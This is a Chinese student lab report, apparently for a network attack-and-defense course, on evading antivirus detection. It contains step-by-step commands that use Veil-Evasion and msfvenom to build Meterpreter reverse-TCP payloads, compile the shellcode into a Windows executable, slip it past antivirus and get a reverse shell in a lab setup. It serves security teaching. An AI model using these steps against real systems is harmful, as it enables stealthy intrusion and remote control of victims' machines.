zoukankan      html  css  js  c++  java
  • 20145324 王嘉澜《网络对抗技术》 免杀原理与实践

    实验内容

    •使用msf编码器,veil-evasion,以及利用shellcode编程等免杀工具,来验证各种免杀方式的免杀强度
    •通过组合各种技术实现恶意代码免杀,在另一台有杀毒软件的主机上进行测试

    实践步骤

    •通过VirSCAN.org来检测上次实验生成的病毒的抗杀能力
    •检测结果

    •该病毒被检测出来,并被发现是木马病毒
    •吓得我赶紧删了,谁知道检查的时候又让传一遍

    •使用Veil-Evasion生成可执行文件

    •在终端输入指令veil-evasion打开软件

    •设置payload:use python/meterpreter/rev_tcp
    •设置反弹连接IP:set LHOST 192.168.88.129
    •设置反弹端口4444:set port 4444
    •生成:generate
    •程序名:5324
    •选择操作:1
    •程序生成成功,在目录下找到该程序,发送到win检测

    •检测结果

    •C语言调用Shellcode

    •在kali下,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.129 LPORT=5324 -f c 生成一个C语言shellcode数组

    •用命令行创建一个C文件:MSSC.c,将上面生成的数组复制到该文件下,并加入一个主函数
    •使用命令i686-w64-mingw32-g++ MSSC.c -o MSSC_5324.exe 将该C语言代码MSSC.c转换为一个可在64位win下操作的可执行文件MSSC_5324.exe

    •将MSSC_5353.exe传到win,电脑管家马上报告说有危险,添加到信任区,检测
    •检测结果

    •很少一部分软件可以查出来
    •使用ncat把exe传到电脑



    •使用电脑管家杀毒,结果发现不了

    •在Kali下使用msf监听,运行刚刚编译生成的可执行文件,获取权限


    •回连成功

    基础问题回答

    1、杀软是如何检测出恶意代码的?
    •通过特征码:与已经存在的恶意代码进行比对之类的
    •通过行为:恶意代码可能会修改注册表、设置自启动、更改系统日志等

    2、免杀是做什么?
    •通过恶意代码植入技术使得恶意代码不会被杀毒软件检测出来

    3、免杀的基本方法有哪些?
    •加壳、使用反弹式连接
    •用其他的语言编译等

    实验总结与体会

    触目惊心,平时信赖的杀毒软件也检测不出来自己写的恶意代码,想到以前自己为了电脑安全还一口气装了好几个杀毒软件,too naive

    离实战还缺的技术或步骤

    杀毒软件的病毒库是不断更新的,真正要实战的话应该还需要投入更多的时间和精力来研究代码漏洞

  • 相关阅读:
    交换机的配置文件和系统映像文件备份与恢复(如果不小心损坏了,可以用这种方法恢复)
    交换机端口安全配置
    路由器密码重置(不是适用于所有有些启动顺序数字不一样)
    交换机的默认网关(跨网段telnet)
    思科交换机的初始配置(使用telnet登录)
    Linux命令集(第一部分共40个)
    Linux6.9安装
    javamail邮件发送报错解决方案
    isEmpty()与equals()、==“”区别
    eclipse svn 修改了类名之后提交
  • 原文地址:https://www.cnblogs.com/SJZGM10/p/6616406.html
Copyright © 2011-2022 走看看